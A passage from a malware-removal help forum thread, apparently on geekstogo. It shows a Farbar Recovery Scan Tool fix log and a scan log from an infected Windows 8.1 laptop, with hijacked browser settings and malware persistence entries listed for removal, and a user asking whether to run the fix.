"HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\JKZDOH8VNLX91K7" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\JKZDOH8VNLX91K7" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\4571129" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\4571129" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Q92XOF6FK3X9RHU" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Q92XOF6FK3X9RHU" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\6137198" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\6137198" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\1204047" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\1204047" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\1214425" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\1214425" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\9352489" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\9352489" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\9159382" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\9159382" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\E054W697C3ZT54X" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\E054W697C3ZT54X" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\19U1RNX4SXNVB7C" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\19U1RNX4SXNVB7C" => not found "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\SWPR71H14U5B9RU" => removed successfully "HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\SWPR71H14U5B9RU" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{AD0BAEF4-48BF-498A-B8E3-0D1E6B43B2BE}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{57D02F10-F87D-4455-8142-3BD552673374}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{7B7AEBBA-530C-47FF-B21F-41D628410DFC}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{587A092A-9420-4320-9DDC-513DB0956BC2}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3F8E71DB-3CB9-46B0-9EEC-7E5BBF163810}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F323F12D-3EEC-4458-B055-FBAD54D42779}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3F67B498-C298-4567-8384-9D4AE7900D1F}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{39A83BDE-1430-4A5B-8585-D464B7D8D881}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9965AD37-C5DF-45BB-A1C2-549EA064C54F}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B8A59D96-BE63-4FC8-A092-04A578AB2D75}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{FCAB66D8-96FF-4F4B-A106-15A490C11107}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{C180034F-D109-4AFE-8F36-F09BB28A0030}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F03F74C6-9B28-4C5E-807F-CFFCE0C2E487}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5BAFDC52-58EF-4B5B-A341-46B75F445987}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D5FA44F3-6E70-484A-B950-51C23F63C442}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{798BE548-E73F-4AF0-94AC-9E161FCF481B}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B5F6D4BD-ADF9-4442-A0DC-0243CA6C4944}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6B7EAF84-2E3E-4E50-BA29-83BCA3A5D636}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{53056AED-CF0C-4B77-BE51-E7320F566EF1}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{99F55921-8B24-4D45-9447-4B1DC03D0F8F}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{926B5B97-5586-42AD-A783-764467766E9E}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C1F252D6-9E31-4C1C-92CA-5144E45CBD5F}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3982D1B5-9BA8-4969-BF52-16243FA460F3}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6F63DBCC-4ACC-457F-93AE-3F8F539D5481}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{38634E52-E26E-4827-B65C-6FD60DEEFCC1}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B8B2B85F-89FA-41D1-84C9-AD725179C6CF}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{68A8AE5E-4C4A-41A3-9B22-62A04FA9BE31}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{221BFC9C-CC6F-4FE4-B04E-F71FA6660C03}" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2443D1D6-CC7F-4A8D-8467-39EE257F12AF}" => not found "C:\Program Files (x86)\IncrediMail" => not found C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss => moved successfully C:\Program Files (x86)\UCBrowser => moved successfully C:\Windows\System32\drivers\WinmonFS.sys => moved successfully C:\Windows\System32\drivers\Winmon.sys => moved successfully Could not move "C:\Windows\2CCD359FD649.sys" => Scheduled to move on reboot. "C:\Users\Stanley\AppData\Roaming\EpicNet Inc" => not found "C:\Windows\rss\csrss.exe" => not found "C:\Windows\windefender.exe" => not found "C:\Users\Stanley\AppData\Roaming\EpicNet Inc" => not found C:\Users\RoseGold\AppData\Local\Temp\syncios.exe => moved successfully C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe => moved successfully C:\Users\Stanley\AppData\Local\Temp\syncios.exe => moved successfully C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe => moved successfully =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 136055492 B Java, Flash, Steam htmlcache => 1043 B Windows/system/drivers => 30584 B Edge => 0 B Chrome => 2285654920 B Firefox => 115633553 B Opera => 104112666 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 249204 B systemprofile32 => 128 B LocalService => 8428 B NetworkService => 219514 B Stanley => 302640661 B RoseGold => 133325 B Administrator => 129509 B RecycleBin => 75887717 B EmptyTemp: => 2.8 GB temporary data Removed. ================================ Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 15-02-2019 00:07:15) C:\Windows\2CCD359FD649.sys => Could not move ==== End of Fixlog 00:07:16 ====
  10. THANK YOU FOR YOUR REPLY. Please before i run the fix, i want you to understand i found a way to open my windows defender and it did found lots of PUPs and removed them. should i still go ahead and run the fixlist.txt??????? i hope you reply asap
  11. FRST.TXT Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10.02.2019 01 Ran by #Strazzo.RoseGold## (administrator) on STRAZZOWEEZY (12-02-2019 07:09:07) Running from C:\Users\Stanley\Downloads\FRST Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator) Platform: Windows 8.1 Enterprise (Update) (X64) Language: English (United States) Default browser: IE Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe (LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe (HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe (Iskysoft) C:\Program Files (x86)\iSkysoft\IAF\2.4.2.223\IsAppService.exe (Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE ( ) C:\Program Files\OpenVPN\bin\openvpnserv2.exe (The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpnserv.exe (The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe (The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe (The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe (BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe (Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe (BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe (Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe (Microsoft Corporation) C:\Windows\System32\StikyNot.exe (Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe (Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe (Apple, Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\secd.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler64.exe (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe () C:\Windows\windefender.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16.0.3327.1048_x64__8wekyb3d8bbwe\onenoteim.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\idmBroker.exe (Microsoft Corporation) C:\Windows\System32\prevhost.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [53535296 2019-02-02] (Skype Software Sarl -> Skype Technologies S.A.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [OPENVPN-GUI] => C:\Program Files\OpenVPN\bin\openvpn-gui.exe [672384 2018-04-26] (OpenVPN Technologies, Inc. -> ) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [utweb] => C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe [5216440 2018-04-24] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [uTorrent] => C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe [1908920 2019-01-17] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3907152 2015-07-07] (Tonec Inc. -> Tonec Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IncrediMail] => C:\Program Files (x86)\IncrediMail\bin\IncMail.exe [444352 2018-06-10] (IncrediMail Inc. -> IncrediMail Ltd.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RIMDeviceManager] => C:\Program Files (x86)\Common Files\Research In Motion\RIMDeviceManager\RIMDeviceManager.exe [2471672 2015-05-20] (BlackBerry Ltd. -> Research In Motion Limited) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2018-12-03] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [AppleIEDAV] => C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe [68408 2018-12-03] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [110392 2018-12-03] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [67896 2019-01-15] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudPhotos] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe [356664 2018-12-03] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-11-22] (Microsoft Windows -> Microsoft Corporation) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [WitheredHill] => C:\Windows\rss\csrss.exe [4521472 2019-02-08] () <==== ATTENTION HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [CloudNet] => C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-12] (EpicNet Inc.) <==== ATTENTION HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {2c5e9d22-76c0-11e8-825e-402cf4d8539a} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL E:\start.exe HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0bf7-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0c50-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0d35-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" HKU\S-1-5-18\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-18\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKU\S-1-5-18\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-18\...\Policies\Explorer: [NoInternetOpenWith] 1 HKLM\...\Drivers32-x32: [msacm.iac2] => C:\Windows\SysWOW64\iac25_32.ax [197632 2013-08-22] (Intel Corporation) HKLM\...\Drivers32-x32: [VIDC.GEOS] => C:\Windows\SysWOW64\GeoCodecD.dll [622592 2010-10-11] (GeoVision) HKLM\Software\Microsoft\Active Setup\Installed Components: [OpenVPN_UserSetup] -> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OPENVPN-GUI /t REG_SZ /d "C:\Program Files\OpenVPN\bin\openvpn-gui.exe" /f HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2018-12-18] (Google Inc -> Google Inc.) HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt Tcpip\..\Interfaces\{25D62E88-57F7-4879-91B3-0FBE5C8B4F71}: [DhcpNameServer] 1.1.1.1 1.0.0.1 Tcpip\..\Interfaces\{8BF038DF-16AA-4203-90BE-740E3461F3D4}: [DhcpNameServer] 192.168.8.1 Tcpip\..\Interfaces\{D14C4B82-5B48-498C-8F6E-81ADA12C1C8C}: [DhcpNameServer] 172.20.10.1 Tcpip\..\Interfaces\{D433F076-2F7D-4301-BE73-E8CE381871C0}: [DhcpNameServer] 192.168.8.1 Internet Explorer: ================== HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eouPPD3a3O4qGVi5Es4iIR24Y7nh9akfPai5Q1OuzbONZLJRZFaqq_kxQ9Z-DCo_GGN5rXIyO8FSvytDaIXTrMcfHrh750Q&q={searchTerms} HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eoicpfV_MriSUAQnsKvLWIZ4S1YS7CQyd2I9U6z0Wmnkj5s8T6U3A_ZCShl9ETmnnVUnHlDWcYqc1HesPtQHGIzTqr4X-kp HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp SearchScopes: HKLM-x32 -> DefaultScope value is missing SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms} SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms} BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.) BHO: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.) BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File IE Session Restore: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> is enabled. FireFox: ======== FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-10] FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy] FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed] FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-12] [Legacy] [not signed] FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] () FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] () FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] () FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.) Chrome: ======= CHR DefaultProfile: Profile 3 CHR Session Restore: Profile 3 -> is enabled. CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-08] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-08] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04] CHR Extension: (Serpdigger - 1st Email Extractor) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\clpkfpkkbjjplgkblpjkkfddbbkipokl [2019-01-22] CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 